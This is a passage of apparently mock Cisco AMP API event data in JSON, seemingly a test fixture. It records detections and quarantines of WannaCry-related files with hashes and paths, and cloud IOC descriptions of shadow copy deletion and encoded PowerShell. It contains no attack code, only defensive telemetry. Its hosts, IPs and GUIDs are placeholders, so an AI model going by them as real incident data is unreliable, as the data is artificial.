Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 